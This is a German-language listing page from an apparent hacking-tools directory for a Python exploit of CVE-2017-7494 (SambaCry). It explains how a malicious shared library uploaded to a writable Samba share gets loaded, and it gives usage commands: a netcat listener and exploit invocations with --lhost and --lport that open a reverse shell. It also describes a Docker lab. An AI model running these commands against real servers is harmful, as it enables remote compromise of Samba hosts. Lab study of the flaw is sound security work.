Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/yonliud/cve-2017-7494
SchwachstellenanalyseExploitationLernen & BildungLabs & Praxis
GitHubyonliud/cve-2017-7494

CVE-2017-7494

Python-Exploit für CVE-2017-7494 (SambaCry), der authentifizierte Remote-Codeausführung demonstriert, indem er eine schädliche Shared Library auf eine Samba-Freigabe hochlädt und deren Laden mittels dlopen auslöst.

Repository anzeigen
2vor 6 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SambaCry (CVE-2017-7494) Exploit

CVE-2017-7494/SambaCry ermöglicht es authentifizierten Benutzern, eine gemeinsame Bibliothek in einen beschreibbaren Ordner hochzuladen und mithilfe der hochgeladenen Bibliotheken einen Ausführungsangriff durchzuführen.

Erklärung der Schwachstelle

SambaCry ist eine Pfadvalidierungsschwachstelle in der Art und Weise, wie Samba Named-Pipe-Anfragen verarbeitet. Normalerweise werden diese Pipes verwendet, um Programmen die Kommunikation untereinander zu ermöglichen, indem sie Daten über einen dateiähnlichen Kanal lesen und schreiben.

Wenn Samba einen unbekannten Pipe-Namen empfängt, können verwundbare Versionen diesen als Namen eines dynamisch ladbaren Moduls behandeln. Diese Module sind normalerweise legitime .so-Bibliotheken, die vom Administrator installiert wurden.

Die Schwachstelle erlaubt es einem Client, anstelle eines normalen Modul- oder Pipe-Namens einen absoluten Dateisystempfad anzugeben. Samba schränkt diesen Pfad nicht ordnungsgemäß ein und kann effektiv Folgendes ausführen: dlopen("/data/example.so", ...);.

Das Laden einer gemeinsamen Bibliothek führt deren Initialisierungscode aus. Daher kann ein Angreifer, der eine bösartige .so-Datei an einen beschreibbaren Speicherort hochladen kann, den Samba-Dienst dazu veranlassen, diese zu laden, was zu Remote-Codeausführung führt.

Demo

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

Verwendung

  1. Einen Listener initialisieren:
root@kitploit:~
nc -lvnp 4444
  1. Den vollständigen Prozess ausführen
root@kitploit:~
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

Um eine bereits hochgeladene Payload auszulösen:

root@kitploit:~
python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. Im Terminal des Listeners sollte eine Shell erscheinen.

Laborumgebung

Verwendung der vorgefertigten docker-compose.yml zur Initialisierung des verwundbaren Labors.

root@kitploit:~
docker compose up -d

Das Labor verwendet Samba 4.5.9, das durch die Schwachstelle verwundbar ist.

Betroffene Versionen

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3

Tool herunterladen